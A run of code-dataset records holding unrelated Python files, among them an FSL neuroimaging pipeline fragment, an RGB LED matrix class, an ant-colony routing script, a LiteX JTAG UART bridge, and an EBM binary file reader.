FLIRT')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"flirt\",'-in',root_dir+'processed/'+subject+'_'+str(step-1)+'-bet.nii.gz','-ref',ref,'-out',root_dir+'processed/'+subject+'_'+str(step)+'-flirt.nii.gz')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\n\t\t\t\telif step == 4:\n\t\t\t\t\tprint('... FAST')\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\targs = (\"fast\",'-g',root_dir+'processed/'+subject+'_'+str(step-1)+'-flirt.nii.gz')\n\t\t\t\t\tprint(args)\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\t\t\t\t\tpopen.wait()\t\t\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\texcept Exception as e:\n\t\tprint(e)\n\n\n\n\n\n\n","sub_path":"scripts/fsl_pipe.py","file_name":"fsl_pipe.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623843138","text":"#class to represent LED light matrices (where each LED takes an RGB value)\n#m is number of rows (=height)\n#n is number of columns (=length)\nclass Matrix(object):\n\n #constructor that instantiates an (MxN) 0-matrix (optional param to include matrix indices to set)\n def __init__(self, m, n, data=None):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m <= 0 or n <= 0):\n raise MatrixError(\"Invalid dimension(s)\")\n\n self.rows = [[(0,0,0)]*n for x in range(m)]\n self.m = m\n self.n = n\n\n if (data):\n self.setdata(data)\n\n #get value of matrix[row][col]\n def getdatum(self, m, n):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m < 0 or n < 0 or m > self.m-1 or n > self.n-1):\n raise MatrixError(\"Invalid matrix index\")\n \n return self.rows[m][n]\n\n #get matrix representing the given column of self\n def getcolumn(self, n):\n\n #check for valid data\n if (not type(n) is int or n < 0 or n > self.n-1):\n raise MatrixError(\"Invalid column index\")\n\n output = Matrix(self.m, 1)\n for m in range(self.m):\n output.setdatum(m, 0, self.rows[m][n])\n\n return output\n\n #get matrix representing the given row of self\n def getrow(self, m):\n\n #check for valid data\n if (not type(m) is int or m < 0 or m > self.m-1):\n raise MatrixError(\"Invalid row index\")\n\n output = Matrix(1, self.n)\n for n in range(self.n):\n output.setdatum(0, n, self.rows[m][n])\n\n return output\n\n #return submatrix of self given row and column indices\n #submatrix is computed from top left\n def get_submatrix(self, m, n):\n\n #check inputs\n if (not type(m) is int or m < 0 or not type(n) is int or n < 0):\n raise MatrixError(\"Invalid matrix index\")\n\n row_bound = self.m if (m >= self.m) else m\n col_bound = self.n if (n >= self.n) else n\n\n output = Matrix(row_bound, col_bound)\n for x in range(row_bound):\n for y in range(col_bound):\n output.setdatum(x, y, self.rows[x][y])\n return output\n\n #check whether self is all 0's\n def is_empty(self):\n for m in range(self.m):\n for n in range(self.n):\n if (self.rows[m][n] != (0,0,0)):\n return False\n return True\n\n #copy_constructor\n def copy_construct(self):\n\n output = Matrix(self.m, self.n)\n for m in range(self.m):\n for n in range(self.n):\n output.setdatum(m, n, self.rows[m][n])\n return output\n\n #set the value of matrix[row][col]\n def setdatum(self, m, n, data):\n \n #check for valid data\n if (not type(m) is int or not type(n) is int or m < 0 or n < 0 or m > self.m-1 or n > self.n-1):\n raise MatrixError(\"Invalid matrix index\")\n if (not type(data) is tuple or not 
len(data) >= 3 or not (data[0] >= 0 and data[0] <= 255) or not (data[1] >= 0 and data[1] <= 255) or not (data[2] >= 0 and data[2] <= 255)):\n raise MatrixError(\"Invalid input data\")\n \n self.rows[m][n] = data\n return True\n\n #method to set multiple indices in the matrix at once\n #input format: a list of 3-element tuples (m, n, data)\n def setdata(self, data):\n\n #check for valid data\n if (not type(data) is list):\n raise MatrixError(\"Input must be a list\")\n\n for point in data:\n if (not type(point) is tuple or len(point) < 3):\n raise MatrixError(\"Invalid matrix index data\")\n self.setdatum(point[0], point[1], point[2])\n\n #copy input matrix into self\n def copy(self, matrix):\n \n #check for valid data\n if (not type(matrix) is Matrix):\n raise MatrixError(\"Copy input must be a matrix\")\n\n self.rows = []\n self.rows = [[(0,0,0)]*matrix.n for x in range(matrix.m)]\n\n row_count = 0\n col_count = 0\n for m in range(matrix.m):\n for n in range(matrix.n):\n self.rows[m][n] = matrix.rows[m][n]\n\n self.m = matrix.m\n self.n = matrix.n\n\n #concatenate input matrix onto self\n def concatenate(self, matrix):\n\n #validate inputs\n if ((not type(matrix) is Matrix) or (not matrix.m == self.m)):\n raise MatrixError(\"Invalid input matrix. Matrices must have same height\")\n\n output = Matrix(self.m, self.n+matrix.n)\n col_count = 0\n for n in range(self.n):\n for m in range(self.m):\n output.rows[m][n] = self.rows[m][n]\n col_count += 1\n for n in range(matrix.n):\n for m in range(matrix.m):\n output.rows[m][col_count+n] = matrix.rows[m][n]\n\n return output\n\n #stack self on top of input matrix\n def stack_matrix(self, matrix):\n\n #validate inputs\n if ((not type(matrix) is Matrix) or (not matrix.n == self.n)):\n raise MatrixError(\"Invalid input matrix. Matrices must have same number of columns\")\n\n output = Matrix(self.m+matrix.m, self.n)\n row_count = 0\n for m in range(self.m):\n for n in range(self.n):\n output.rows[m][n] = self.rows[m][n]\n row_count += 1\n for m in range(matrix.m):\n for n in range(matrix.n):\n output.rows[row_count+m][n] = matrix.rows[m][n]\n\n return output\n\n #replace left/rightmost n columns with input\n def shift_horizontal(self, left, new_col):\n\n #validate inputs\n if (not type(left) is bool or not type(new_col) is Matrix or (not self.m == new_col.m)):\n raise MatrixError(\"Invalid inputs. Matrices must have the same height\")\n\n shift_factor = self.n - new_col.n\n if (shift_factor <= 0):\n #replace the old matrix entirely\n self.copy(new_col)\n return\n else:\n #shift columns to the left\n if (left):\n output = Matrix(self.m, shift_factor)\n for m in range(self.m):\n for n in range(new_col.n,self.n):\n output.setdatum(m, n-new_col.n, self.rows[m][n])\n self.copy(output.concatenate(new_col))\n #shift columns to the right\n else:\n output = Matrix(new_col.m, new_col.n)\n output.copy(new_col)\n temp = Matrix(self.m, shift_factor)\n for m in range(self.m):\n for n in range(shift_factor):\n temp.setdatum(m, n, self.rows[m][n])\n self.copy(output.concatenate(temp))\n\n #replace top/bottom n rows with input\n def shift_vertical(self, bottom, new_rows):\n\n #validate inputs\n if (not type(bottom) is bool or not type(new_rows) is Matrix or (not self.n == new_rows.n)):\n raise MatrixError(\"Invalid inputs. 
Matrices must have the same number of columns\")\n\n        shift_factor = self.m - new_rows.m\n        if (shift_factor <= 0):\n            #replace the old matrix entirely\n            self.copy(new_rows)\n            return\n        else:\n            #shift rows up\n            if (bottom):\n                output = Matrix(shift_factor, self.n)\n                for n in range(self.n):\n                    for m in range(new_rows.m,self.m):\n                        output.setdatum(m-new_rows.m, n, self.rows[m][n])\n                self.copy(output.stack_matrix(new_rows))\n            #shift rows down\n            else:\n                output = Matrix(new_rows.m, new_rows.n)\n                output.copy(new_rows)\n                temp = Matrix(shift_factor, self.n)\n                for n in range(self.n):\n                    for m in range(shift_factor):\n                        temp.setdatum(m, n, self.rows[m][n])\n                self.copy(output.stack_matrix(temp))\n\n    #logical functions - WHAT TO PUT HERE????\n\n    #print the matrix to console\n    def print_matrix(self):\n        for m in range(self.m):\n            row = \"\"\n            for n in range(self.n):\n                row += \"(\"\n                row += str(self.rows[m][n][0])\n                row += \",\"\n                row += str(self.rows[m][n][1])\n                row += \",\"\n                row += str(self.rows[m][n][2])\n                row += \")\"\n            print (row)\n\n    #function to test display\n    def test_display(self):\n        for m in range(self.m):\n            row = \"\"\n            for n in range(self.n):\n                if (self.rows[m][n][0] == 255):\n                    row += \".\"\n            print (row)\n    \n    \n#error class\nclass MatrixError(Exception):\n    def __init__(self, message):\n        Exception.__init__(self, message)\n\n    \n","sub_path":"MatrixRGB.py","file_name":"MatrixRGB.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236316155","text":"import requests\n# Base URL being accessed\nurl = 'http://httpbin.org/post'\n\n# Dictionary of query parameters (if any)\nparms = {\n   'name1' : 'value1',\n   'name2' : 'value2'\n}\n\n# Extra headers\nheaders = {\n    'User-agent' : 'none/ofyourbusiness',\n    'Spam' : 'Eggs'\n}\nresp = requests.post(url, data=parms, headers=headers)\n\n# Decoded text returned by the request\ntext = resp.text\nprint(text)\n\nimport requests\nurl = 'http://httpbin.org/post'\nfiles = {'file': ('data.csv', open('data.csv', 'rb'))}\nr = requests.post(url, files=files)","sub_path":"base/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238725994","text":"import pandas as pd\nimport numpy as np\nfrom random import randint\n\n#code init\niterations = 1000\nants = 13\n\n#datastructure\ngraph = []\nph = []\nnum_node = 0\nnodes = []\n\n#param\nalpha=0.5\nbeta=0.5\ndens=0.25\n\ndef read_data():\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t#reading time matrix from csv file\n\tdt = pd.read_csv('ip2.csv')\n\tgraph = dt.to_numpy()\n\tnum_node = len(graph)\n\ttemp = []\n\n\t#initialization of the pheromone matrix\n\tfor i in range(num_node):\n\t\tph.append([1 for i in range(num_node)])\n\n\t#initialization of all nodes\n\tnodes = [ i for i in range(num_node) ]\n\ndef start_ant(nvis,dpot):\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t# init, cp(current position) is dpot.\n\tcp=dpot\n\tpath = []\n\tpath.append(cp)\n\t# This loop makes the ant visit each and every vertex. 
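A brief usage sketch for the `Matrix` class in `MatrixRGB.py` above, scrolling one new column of pixels into a 3x4 LED frame with `shift_horizontal` (the class itself is assumed to be in scope; pixel values are the RGB tuples it validates):

```python
frame = Matrix(3, 4)
frame.setdatum(0, 0, (255, 0, 0))        # red pixel in the top-left corner

new_col = Matrix(3, 1)                   # the column entering from the right
new_col.setdata([(0, 0, (0, 255, 0)),    # green at row 0
                 (2, 0, (0, 0, 255))])   # blue at row 2

frame.shift_horizontal(True, new_col)    # True = scroll left; column 0 falls off
frame.print_matrix()
```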
By the time visiting the vertex, it will remove the vertex from nvis(not visited list).\n\twhile len(nvis)!=0:\n\t\t#count the probabilities of non visited vertex.\n\t\tprobabilities = list(map(lambda x: ( ( ( (ph[cp][x])**alpha)*((1/graph[cp][x])**beta)) ) , nvis))\n\t\tprobabilities = probabilities/np.sum(probabilities) \n\n\t\t# counting next vertex in the bases of heigest probability.\n\t\tcp=nvis[0]\n\t\tmm=probabilities[0]\n\t\tfor i in range(len(probabilities)):\n\t\t\tif probabilities[i] >mm:\n\t\t\t\tmm=probabilities[i]\n\t\t\t\tcp=nvis[i]\n\t\t# appending next vertex in path and removing from the list of non visited vertex.\n\t\tpath.append(cp)\n\t\tnvis.remove(cp)\n\t#returning the path of individual ant.\n\treturn path\n\ndef update_feromone(dpot,best_solution,shortest_dist):\n\t# for all the edge, decresing the level of feromone.\n\tfor i in range(num_node):\n\t\tfor j in range(num_node):\n\t\t\tph[i][j] -= (1-dens)*ph[i][j]\n\t\t\t# if the feromone level become 0 then it will not appropriate for the probability count.\n\t\t\t# So, I've taken 0.0000000001 insted of 0. \n\t\t\tif ph[i][j]<=0:\n\t\t\t\tph[i][j]=(10**(-10))\n\n\t# cp is current position\n\t# starting from dpot which is 0 by default.\n\tcp = dpot\n\n\t#end of the path is also dpot(0). so, i'm appending mnly.\n\tbest_solution[1].append(dpot)\n\t#path = [1,2,3,4,0]\n\t# 0-1\n\t# 1-2\n\t# 2-3\n\t# 3-4\n\t# 4-0\n\n\t# taking each edges in best path and updating feromone level.\n\tfor x in best_solution[1]:\n\t\tif cp != x:\n\t\t\t#Q=1,l=graph[cp][x]\n\t\t\tph[cp][x] += 1/graph[cp][x] + (ants/6)*(1/shortest_dist[0])\n\t\t\tph[x][cp] = ph[cp][x]\n\t\t\tcp=x\n\ndef getWeight(path,dpot):\n\t# this function counts the summation of the path.\n\tx=dpot\n\tweight = 0\n\tfor y in path:\n\t\tweight+=graph[x][y]\n\t\tx=y\n\tweight+=graph[x][dpot]\n\treturn weight\n\ndef get_best_solution(solution):\n\t# this function returns path which has min length.\n\tma=solution[0]\n\tfor soln in solution:\n\t\tif ma[0]>soln[0]:\n\t\t\tma=soln\n\treturn ma\n\ndef opt_2(path):\n\t#making 2 path. temp_path is old path. 
\"path\" is the path where all the 2-opt changes gonna happen.\n\ttemp_path = path.copy()\n\n\t# path = [2,3,4,5,2,3,0]\n\t# selecting rendomly node from the path and removing that node.\n\trnd_node = np.random.choice(path[:-1])\n\tpath.remove(rnd_node)\n\n\t#inserting the selected node randomaly.\n\tpath.insert( randint(0, len(path[:-1])) ,rnd_node)\n\n\t#path = [ 2,5,3,4,2,3,0]\n\t\n\t#If the new path has less cost than old one, update the path by returning new one.\n\tif getWeight(temp_path,0) > getWeight(path,0):\n\t\treturn path\n\telse:\n\t\treturn temp_path\n\ndef start_spreading_ants(nvis,shortest_dist):\n\tglobal graph\n\tglobal ph\n\tglobal num_node\n\tglobal nodes\n\n\t#solution will store all the paths which are coverd by 13 ants.\n\tsolution = []\n\n\tfor i in range(ants):\n\t\t#nvis is list of not visited nodes.\n\t\tnnvis = nvis.copy()\n\t\t#selecting randome starting point.\n\t\tdpot = np.random.choice(nnvis)\n\t\tnnvis.remove(dpot)\n\t\t#ant will start from the mentioned dpot.\n\t\tpath = start_ant(nnvis,dpot)\n\t\t# path = opt_2(path)\n\t\tsolution.append( (getWeight(path,0),path) )\n\n\t# \"get_best_solution\" will return shortest path coverd among all the ants.\n\tbest_solution = get_best_solution(solution)\n\n\t# \"opt_2\" will apply 2-opt method on best solution.\n\topt_best_solution = opt_2(best_solution[1])\n\t# upedating the best solution.\n\t#todo:\n\tbest_solution = ( getWeight(opt_best_solution,0) , opt_best_solution )\n\t\n\t#updating the shortest distance.\n\tif shortest_dist[0] > best_solution[0]:\n\t\tshortest_dist=best_solution\n\n\t#This will update the feromone level.\n\tupdate_feromone(0,best_solution,shortest_dist)\n\treturn shortest_dist\n\ndef main():\n\tglobal alpha\n\tglobal beta\n\tglobal dens\n\tglobal iterations\n\n\t#taking input from user\n\tprint(\"------------------------------------------------------------------\")\n\tveh1 = input(\"Vehical 1's nodes :\").split(' ')\n\tveh2 = input(\"Vehical 2's nodes :\").split(' ')\n\tveh3 = input(\"Vehical 3's nodes :\").split(' ')\n\n\tveh1 = [ int(i) for i in veh1 ]\n\tveh2 = [ int(i) for i in veh2 ]\n\tveh3 = [ int(i) for i in veh3 ]\n\n\t# veh1 = [1,4,6,9,10,12]\n\t# veh2 = [8,11,13,2,5]\n\t# veh3 = [3,7]\n\n\tprint(\"alpha:\",alpha, \" | beta:\", beta, \" | density\",dens, \" | Iterations: \",iterations, \" | ants:\",ants)\n\n\t# code for n number of iteration\n\tfor itr in range(500):\n\t\tread_data()\n\n\t\titerations=itr\n\t\t#iteration = 1\n\t\t# for n number of iterations, spreading ants in the graph.\n\t\tshortest_dist = (10**200,[])\n\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t\tsd1=shortest_dist\n\n\t\tshortest_dist = (10**200,[])\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t\tsd2=shortest_dist\n\n\t\tshortest_dist = (10**200,[])\n\t\tfor _ in range(iterations):\n\t\t\t# this will start spreading ants in the graph.This will return shortest distance of all the previous iterations\n\t\t\tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t\tsd3=shortest_dist\n\n\t\t#printing result, shortest distance of all the vehicals.\n\t\tprint(itr,\",\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\nif __name__ == '__main__':\n\tmain()\n\n\n\t\n\t# shortest_dist = 
(10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t# sd1=shortest_dist\n\t# print(\"Vehical 1 : \",shortest_dist)\n\n\t# shortest_dist = (10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t# sd2=shortest_dist\n\t# print(\"Vehical 2 : \",shortest_dist)\n\n\t# shortest_dist = (10*200,[])\n\t# for _ in range(iterations):\n\t# \tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t# sd3=shortest_dist\n\t# print(\"Vehical 3 : \",shortest_dist)\n\t# print(\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\n\n\n\t# for q in [0.5]:\n\t# \tfor i in [0.1,0.2,0.3,0.5,0.6,0.8,1]:\n\t# \t\tfor j in [0.2,0.3,0.5,0.6,0.8,0.9,1]:\n\t# \t\t\talpha=i\n\t# \t\t\tbeta=j\n\t# \t\t\tdens=q\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh1,shortest_dist)\n\t# \t\t\tsd1=shortest_dist\n\t# \t\t\t#print(\"Vehical 1 : \",shortest_dist)\n\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh2,shortest_dist)\n\t# \t\t\tsd2=shortest_dist\n\t# \t\t\t#print(\"Vehical 2 : \",shortest_dist)\n\n\t# \t\t\tshortest_dist = (10*200,[])\n\t# \t\t\tfor _ in range(iterations):\n\t# \t\t\t\tshortest_dist = start_spreading_ants(veh3,shortest_dist)\n\t# \t\t\tsd3=shortest_dist\n\t# \t\t\t#print(\"Vehical 3 : \",shortest_dist)\n\t\t\t\t# print(q,\",\",i,\",\",j,\",\",sd1[0],\",\",sd2[0],\",\",sd3[0])\n\n#TODO\n#1. name of variables(ACC to problem)\n#2. MM ideal time.","sub_path":"elist.py","file_name":"elist.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"130836359","text":"#!/usr/bin/env python3\n\n#\n# This file is part of LiteX.\n#\n# Copyright (c) 2020 Florent Kermarrec \n# SPDX-License-Identifier: BSD-2-Clause\n\n# Proof of Concept to use the JTAG UART with lxterm.\n\nimport os\nimport pty\nimport threading\nimport telnetlib\nimport time\nimport argparse\n\nfrom litex.build.openocd import OpenOCD\n\nparser = argparse.ArgumentParser(description=\"LiteX JTAG UART bridge tool\")\nparser.add_argument(\"--config\", default=\"openocd_xc7_ft2232.cfg\", help=\"OpenOCD config file\")\nparser.add_argument(\"--telnet-port\", default=\"20000\", help=\"OpenOCD telnet port\")\nargs = parser.parse_args()\n\ndef openocd_jtag_telnet():\n\tprog = OpenOCD(args.config)\n\tprog.stream(int(args.telnet_port))\n\nm, s = pty.openpty()\nprint(\"LiteX JTAG UART created: {}\".format(os.ttyname(s)))\n\nopenocd_jtag_telnet_thread = threading.Thread(target=openocd_jtag_telnet)\nopenocd_jtag_telnet_thread.start()\n\ntime.sleep(1)\n\nt = telnetlib.Telnet(\"localhost\", int(args.telnet_port))\n\ndef pty2telnet(m):\n while True:\n r = os.read(m, 1)\n t.write(r)\n if r == bytes(\"\\n\".encode(\"utf-8\")):\n \tt.write(\"\\r\".encode(\"utf-8\"))\n t.write(\"\\n\".encode(\"utf-8\"))\n\ndef telnet2pty(m):\n\twhile True:\n\t\tr = t.read_some()\n\t\tos.write(m, bytes(r))\n\npty2telnet_thread = threading.Thread(target=pty2telnet, args=[m])\npty2telnet_thread.start()\n\ntelnet2pty(m)\n","sub_path":"litex/tools/litex_jtag_uart.py","file_name":"litex_jtag_uart.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302826062","text":"import time\nfrom datetime import datetime\nfrom matplotlib import pyplot as 
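One note on `elist.py` above: despite the name, `opt_2` performs a single-node relocation (remove one random city, reinsert it elsewhere), not the classical 2-opt move. For comparison, a self-contained sketch of a true 2-opt step, which reverses the segment between two cut points and keeps the change only when the closed tour gets shorter; the toy distance matrix stands in for the script's `graph`:

```python
import random

def tour_length(tour, dist):
    # closed tour: wrap from the last node back to the first
    return sum(dist[tour[i]][tour[(i + 1) % len(tour)]]
               for i in range(len(tour)))

def two_opt_step(tour, dist):
    # cut the tour at i and j, reverse the middle segment, keep if shorter
    i, j = sorted(random.sample(range(1, len(tour)), 2))
    candidate = tour[:i] + tour[i:j][::-1] + tour[j:]
    return candidate if tour_length(candidate, dist) < tour_length(tour, dist) else tour

random.seed(0)                      # reproducible toy run
dist = [[0, 2, 9, 4],
        [2, 0, 6, 3],
        [9, 6, 0, 1],
        [4, 3, 1, 0]]
tour = [0, 2, 1, 3]
for _ in range(100):
    tour = two_opt_step(tour, dist)
print(tour, tour_length(tour, dist))
```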
plt\nimport matplotlib\n\ndef main():\n    fileopen = open('datadict\\\\temp\\\\20190118.txt', 'r')\n    datadList = []\n    count = 1\n    oldTimestamp = 0\n    continueCount = 1\n    for lineData in fileopen:\n        timestamp = int(int(lineData.split(',')[0])/1000)\n        if oldTimestamp == timestamp:\n            continue\n        else:\n            oldTimestamp = timestamp\n        # timeArray = time.localtime(timestamp)\n        timeArray = datetime.fromtimestamp(timestamp)\n        timeSt = string_toDatetime(timeArray)\n        temp = float(lineData.split(',')[1])\n        # plt.plot(timestamp, temp, ls=\"-.\", lw=2, c=\"c\",)\n        if len(datadList) < 10:\n            datadList.append(temp)\n        else:\n            avag = mediannum(datadList)\n            if avag - 3 < temp < avag + 3:\n                # print('√ datadList = {}, avag = {:.2f}, temp = {}'.format(datadList, avag, temp))\n                datadList.pop(0)\n                datadList.append(temp)\n                continueCount = 1\n                continue\n            else:\n                print('× {} [{}] {} datadList = {}\\t avag = {:.2f}\\t temp = {}'.format(count, continueCount, timeSt, datadList, avag, temp))\n                datadList.pop(0)\n                datadList.append(temp)\n                count += 1\n                continueCount += 1\n    # plt.show()\n    fileopen.close()\n\n\n\ndef string_toDatetime(string):\n    # return time.strftime(\"%H:%M:%S\", string)\n    return string.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\n# calculate the average\ndef averagenum(num):\n    nsum = 0\n    for i in range(len(num)):\n        nsum += num[i]\n    return nsum / len(num)\n\n# calculate the median\ndef mediannum(num):\n    listnum = [num[i] for i in range(len(num))]\n    listnum.sort()\n    lnum = len(num)\n    if lnum % 2 == 1:\n        i = int((lnum + 1) / 2)-1\n        return listnum[i]\n    else:\n        i = int(lnum / 2)-1\n        return (listnum[i] + listnum[i + 1]) / 2\n\n# calculate the mode\ndef publicnum(num, d = 0):\n    dictnum = {}\n    for i in range(len(num)):\n        if num[i] in dictnum.keys():\n            dictnum[num[i]] += 1\n        else:\n            dictnum.setdefault(num[i], 1)\n    maxnum = 0\n    maxkey = 0\n    for k, v in dictnum.items():\n        if v > maxnum:\n            maxnum = v\n            maxkey = k\n    return maxkey\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"好邻居/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653102719","text":"# Uses python3\nn = int(input())\nA = [int(x) for x in input().split()]\nassert(len(A) == n)\n\nresult = 0\nindex = 0\nfor i in range(1, n):\n    if A[i] > A[index]:\n        index = i\nA[index], A[n-1] = A[n-1], A[index]\n\nindex=0\nfor j in range(1, n-1):\n    if A[j] > A[index]:\n        index = j\nA[index], A[n-2] = A[n-2], A[index]\nresult = A[n-2]*A[n-1]\n\nprint(result)\n\n","sub_path":"week1_programming_challenges/2_maximum_pairwise_product/max_pairwise_product.py","file_name":"max_pairwise_product.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51421442","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: ebmBinaryFile.py,v 1.1.2.1 2012/10/26 08:00:20 xantgui Exp $\n#\n# Copyright (c) Ericsson España S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson España S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson España S.A\n\"\"\"\nThis module contains the wrapper to handle an EBM binary file. 
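The `demo1.py` script above flags a temperature reading when it deviates more than ±3 from the median of the previous ten samples. The same rolling-median check fits in a few lines of standard library code; the input shape (a plain list of floats) is assumed for illustration:

```python
from collections import deque
from statistics import median

def flag_outliers(temps, window=10, tol=3.0):
    # Yield (index, value) for readings farther than `tol` from the
    # median of the preceding `window` readings.
    recent = deque(maxlen=window)
    for i, t in enumerate(temps):
        if len(recent) == window and abs(t - median(recent)) > tol:
            yield i, t
        recent.append(t)   # the outlier still enters the window, as in demo1.py

readings = [20.1, 20.3, 20.2, 20.4, 20.2, 20.3,
            20.1, 20.2, 20.4, 20.3, 35.0, 20.2]
print(list(flag_outliers(readings)))   # [(10, 35.0)]
```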
\n\"\"\"\nfrom ebmDecoder import EBMDecoder\n\nclass EBMBinaryFile(object):\n    '''\n    This class implements a wrapper to handle the EBM binary data found in a file.\n    '''\n\n\n    def __init__(self, binary_file_path, ebm_decoder = None):\n        '''\n        Constructor\n        '''\n        self.binary_file_path = binary_file_path\n        self.ebm_decoder = ebm_decoder\n        \n        self._write_file = None\n        \n    def __del__(self):\n        \"\"\"\n        Destructor\n        \"\"\"\n        if self._write_file:\n            self._write_file.flush()\n            self._write_file.close()\n        \n        \n    def get_binary_file_path(self):\n        \"\"\"\n        Returns the binary file path stored in this class.\n        @rtype: str\n        \"\"\"\n        return self.binary_file_path\n        \n        \n    def get_ebm_decoder(self):\n        \"\"\"\n        Returns the L{EBMDecoder} stored in this class to parse the records\n        @rtype: L{EBMDecoder}\n        \"\"\"\n        return self.ebm_decoder\n        \n    def set_ebm_decoder(self, ebm_decoder):\n        \"\"\"\n        Sets the ebm_decoder in this class to parse the records\n        @param ebm_decoder: the L{EBMDecoder} to parse the records\n        @type ebm_decoder: L{EBMDecoder}\n        \"\"\"\n        self.ebm_decoder = ebm_decoder\n        \n    def read_records(self):\n        \"\"\"\n        Reads and returns all the record found in the binary file. To use this method,\n        the L{EBMDecoder} has to be set.\n        @rtype: list(dict)\n        \"\"\" \n        \n        if self.ebm_decoder == None:\n            return None\n        binary_data = self.read_binary_data()\n        record_list = []\n        \n        while len(binary_data) > 0:\n            record_length = self.ebm_decoder.get_record_length(binary_data)\n            if len(binary_data) >= record_length:\n                current_record_data = binary_data[0:record_length]\n                current_record = self.ebm_decoder.decode(current_record_data)\n                record_list.append(current_record)\n            binary_data = binary_data[record_length:]\n        \n        return record_list\n        \n    def read_binary_data(self):\n        \"\"\"\n        Returns the bytes found in the binary file.\n        @rtype: bytearray\n        \"\"\"\n        b_file = open(self.binary_file_path, \"r\")\n        data = b_file.read()\n        \n        b_file.close()\n        return bytearray(data)\n\n    \n    def write_binary_data(self, binary_data):\n        \"\"\"\n        Writes the binary_data at the end of the binary file.\n        \"\"\"\n        if not self._write_file:\n            self._write_file = open(self.binary_file_path, \"w\")\n        \n        self._write_file.write(str(binary_data))\n        self._write_file.flush()\n#        self._write_file.close()\n#        self._write_file =None\n        \n    def close(self):\n        \"\"\"\n        Close the binary file used to write the binary data.\n        \"\"\"\n        if self._write_file:\n            self._write_file.close()\n\n\n##### TEST UNIT #####\ndef main():\n    decoder = EBMDecoder('../../data/ebm/ebm_event_specification.xml')\n    binary_file = EBMBinaryFile(\"../../data/ebm/ebm_binary_file\", decoder)\n    records1 = binary_file.read_records() \n    \n    \n    binary_file2 = EBMBinaryFile(\"/tmp/ebm_binary_file\", decoder)\n    binary_file2.write_binary_data(binary_file.read_binary_data())\n    records2 = binary_file2.read_records()\n    \n    #print records1\n    #print records2 \n    assert len(records1) == len(records2), \"r1 len(%s) ; r2 len(%s)\" %(len(records1), len(records2))\n    \n    \n    \n    \n    \nif __name__ == '__main__' :\n    main()\n","sub_path":"sds/back_test/ref/ebm/ebmBinaryFile.py","file_name":"ebmBinaryFile.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"559580533","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom myDeckToolDatabase.DAOLPMTABLES import DAOLPMTABLES\ndao = DAOLPMTABLES()\nmodelo1 = 'modelo 1'\nmodelo2 = 'modelo 2'\nmodelo3 = 'modelo 3'\ncartas = 30\nunidades = 1\n\nlista1 = np.array(list(dao.getTempo(modelo1,cartas,unidades)))\nlista2 = 
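`ebmBinaryFile.py` above walks a byte buffer by asking its decoder for each record's length and slicing records off the front. The same length-prefixed framing in a generic, self-contained form, assuming here a 2-byte big-endian length header (the real EBM layout comes from `EBMDecoder`, which is not shown):

```python
import struct

def split_records(data: bytes):
    # Each record: 2-byte big-endian total length (header included), then payload.
    records = []
    while len(data) >= 2:
        (length,) = struct.unpack_from(">H", data)
        if length < 2 or length > len(data):
            break                          # truncated or corrupt trailing record
        records.append(data[2:length])
        data = data[length:]
    return records

print(split_records(b"\x00\x07hello\x00\x04hi"))   # [b'hello', b'hi']
```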
